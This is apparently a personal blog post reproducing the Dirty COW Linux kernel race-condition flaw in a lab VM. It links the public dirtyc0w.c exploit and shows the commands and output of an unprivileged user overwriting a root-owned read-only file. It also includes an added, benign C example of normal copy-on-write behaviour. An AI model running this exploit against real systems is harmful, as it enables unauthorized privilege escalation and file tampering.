Verifying a Linux vulnerability: Dirty COW (CVE-2016-5195)

More than 3 years have passed since last update.

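While studying Linux I was looking into COW and came across information about this vulnerability, so I tried it out on a guest OS on AWS.

To state the conclusion first, the vulnerability was reproduced. (I confirmed that a general user can overwrite a file belonging to the root user.)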

[Sources]
① Description of the vulnerability
https://dirtycow.ninja/
"A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system." (RH)

② Source code used for the experiment
https://github.com/dirtycow/dirtycow.github.io/blob/master/dirtyc0w.c
③ Site used as a reference
https://www.agilegroup.co.jp/technote/dirty-cow.html
④ What is a race condition?
https://ja.wikipedia.org/wiki/%E7%AB%B6%E5%90%88%E7%8A%B6%E6%85%8B
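
The Red Hat description quoted under ① concerns copy-on-write for private mappings. As an added example (not from the original article and not taken from dirtyc0w.c), the C program below shows the guarantee the kernel normally enforces: a store into a MAP_PRIVATE mapping lands in a private copy and never reaches the file. The temporary file path and the function name are assumptions made for this example.

```c
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Added example: returns 1 if a store through a MAP_PRIVATE mapping stayed
   out of the backing file, 0 if the file changed, -1 on a setup error. */
int private_write_stays_private(void)
{
    char path[] = "/tmp/cow_demo_XXXXXX";        /* constructed sample file */
    const char original[] = "This is important file\n";
    size_t len = sizeof(original) - 1;
    char readback[64] = {0};
    char *map = MAP_FAILED;
    int mapping_changed = 0;
    int result = -1;

    int fd = mkstemp(path);
    if (fd < 0) return -1;
    if (write(fd, original, len) != (ssize_t)len) goto out;

    /* Private, writable view of the file: stores must go to a private copy. */
    map = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
    if (map == MAP_FAILED) goto out;

    memcpy(map, "m0000", 5);                     /* first store triggers COW */
    mapping_changed = (memcmp(map, "m0000", 5) == 0);
    munmap(map, len);

    /* Re-read through the descriptor: the file must still hold the original. */
    if (pread(fd, readback, len, 0) != (ssize_t)len) goto out;
    result = mapping_changed && memcmp(readback, original, len) == 0;
out:
    close(fd);
    unlink(path);
    return result;
}

int main(void)
{
    int r = private_write_stays_private();
    printf("file unchanged after private-mapping write: %s\n",
           r == 1 ? "yes" : r == 0 ? "NO" : "setup error");
    return r == 1 ? 0 : 1;
}
```
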

1. As the root user, create a file that is read-only for general users.

$ sudo -s
# more confidencial.txt 
This is important file
# chmod 0404 confidencial.txt 
# exit

2. Run the executable built for the experiment.

$ more confidencial.txt 
This is important file
$ ./dirtyc0w confidencial.txt m00000000000000000
mmap 7f4f3e8e7000

madvise 0

procselfmem 1800000000

$ 

3. As shown below, the file contents have been overwritten by the general user.

$ more confidencial.txt 
m00000000000000000file
$ 

That's all.
Maintenance to keep security strong really is important.

Thank you! :grin:

takeshim
Data Analysis | Machine Learning | Systems Engineer
https://github.com/tkshim